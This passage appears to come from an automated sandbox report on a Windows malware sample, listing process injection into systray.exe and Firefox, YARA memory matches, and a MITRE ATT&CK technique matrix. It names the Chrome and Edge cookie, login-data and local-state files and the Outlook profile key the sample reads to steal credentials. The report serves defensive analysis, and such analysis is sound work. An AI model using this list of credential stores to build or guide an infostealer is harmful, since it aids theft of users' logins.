              Source: C:\Program Files (x86)\WuBSXUiDqhwXVLXuBjVdDHjuoywTWCdIwRYzJyyagYVaopgQMPfoCDhSOSVyTFlNpPtVCyVqFMPZKpnm\x6fGRpae78G.exe Process created: C:\Windows\SysWOW64\systray.exe "C:\Windows\SysWOW64\systray.exe"
              Source: C:\Windows\SysWOW64\systray.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
              Source: x6fGRpae78G.exe, 00000003.00000002.4495819772.0000000001941000.00000002.00000001.00040000.00000000.sdmp, x6fGRpae78G.exe, 00000003.00000000.2396234609.0000000001941000.00000002.00000001.00040000.00000000.sdmp, x6fGRpae78G.exe, 00000006.00000002.4496111779.0000000001AD1000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Program Manager
              Source: x6fGRpae78G.exe, 00000003.00000002.4495819772.0000000001941000.00000002.00000001.00040000.00000000.sdmp, x6fGRpae78G.exe, 00000003.00000000.2396234609.0000000001941000.00000002.00000001.00040000.00000000.sdmp, x6fGRpae78G.exe, 00000006.00000002.4496111779.0000000001AD1000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Shell_TrayWnd
              Source: x6fGRpae78G.exe, 00000003.00000002.4495819772.0000000001941000.00000002.00000001.00040000.00000000.sdmp, x6fGRpae78G.exe, 00000003.00000000.2396234609.0000000001941000.00000002.00000001.00040000.00000000.sdmp, x6fGRpae78G.exe, 00000006.00000002.4496111779.0000000001AD1000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progman
              Source: x6fGRpae78G.exe, 00000003.00000002.4495819772.0000000001941000.00000002.00000001.00040000.00000000.sdmp, x6fGRpae78G.exe, 00000003.00000000.2396234609.0000000001941000.00000002.00000001.00040000.00000000.sdmp, x6fGRpae78G.exe, 00000006.00000002.4496111779.0000000001AD1000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progmanlock

              Stealing of Sensitive Information

              Source: Yara match File source: 0.2.JJ0tnjLiDS.exe.cd0000.0.unpack, type: UNPACKEDPE
              Source: Yara match File source: 00000004.00000002.4496129166.0000000004EB0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match File source: 00000000.00000002.2472795382.0000000000C80000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara match File source: 00000000.00000002.2472836212.0000000000CD1000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
              Source: Yara match File source: 00000006.00000002.4498458965.0000000005870000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara match File source: 00000004.00000002.4495153571.0000000003200000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara match File source: 00000004.00000002.4496072486.0000000004E60000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match File source: 00000003.00000002.4496171848.00000000030D0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
              Source: Yara match File source: 00000000.00000002.2473305146.0000000001470000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
              Source: C:\Windows\SysWOW64\systray.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
              Source: C:\Windows\SysWOW64\systray.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
              Source: C:\Windows\SysWOW64\systray.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
              Source: C:\Windows\SysWOW64\systray.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
              Source: C:\Windows\SysWOW64\systray.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
              Source: C:\Windows\SysWOW64\systray.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State
              Source: C:\Windows\SysWOW64\systray.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State
              Source: C:\Windows\SysWOW64\systray.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
              Source: C:\Windows\SysWOW64\systray.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\

              Remote Access Functionality

              Source: Yara match File source: 0.2.JJ0tnjLiDS.exe.cd0000.0.unpack, type: UNPACKEDPE
              Source: Yara match File source: 00000004.00000002.4496129166.0000000004EB0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match File source: 00000000.00000002.2472795382.0000000000C80000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara match File source: 00000000.00000002.2472836212.0000000000CD1000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
              Source: Yara match File source: 00000006.00000002.4498458965.0000000005870000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara match File source: 00000004.00000002.4495153571.0000000003200000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara match File source: 00000004.00000002.4496072486.0000000004E60000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match File source: 00000003.00000002.4496171848.00000000030D0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
              Source: Yara match File source: 00000000.00000002.2473305146.0000000001470000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
              Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS
              Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services
              Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services
              Execution: Windows Management Instrumentation; Scheduled Task/Job; At; Cron; Launchd; Scheduled Task; Systemd Timers
              Persistence: 1 DLL Side-Loading; Boot or Logon Initialization Scripts; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items
              Privilege Escalation: 312 Process Injection; 1 Abuse Elevation Control Mechanism; 1 DLL Side-Loading; Login Hook; Network Logon Script; RC Scripts; Startup Items
              Defense Evasion: 2 Virtualization/Sandbox Evasion; 312 Process Injection; 1 Deobfuscate/Decode Files or Information; 1 Abuse Elevation Control Mechanism; 4 Obfuscated Files or Information; 2 Software Packing; 1 DLL Side-Loading
              Credential Access: 1 OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync
              Discovery: 121 Security Software Discovery; 2 Virtualization/Sandbox Evasion; 2 Process Discovery; 1 Application Window Discovery; 2 File and Directory Discovery; 12 System Information Discovery; Remote System Discovery
              Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management
              Collection: 1 Email Collection; 1 Archive Collected Data; 1 Data from Local System; Input Capture; Keylogging; GUI Input Capture; Web Portal Capture
              Command and Control: 1 Encrypted Channel; 3 Ingress Tool Transfer; 4 Non-Application Layer Protocol; 4 Application Layer Protocol; Fallback Channels; Multiband Communication; Commonly Used Port
              Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel
              Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery
              [Behavior graph: ID 1612323; Sample: JJ0tnjLiDS.exe; Startdate: 11/02/2025; Architecture: WINDOWS; Score: 100]
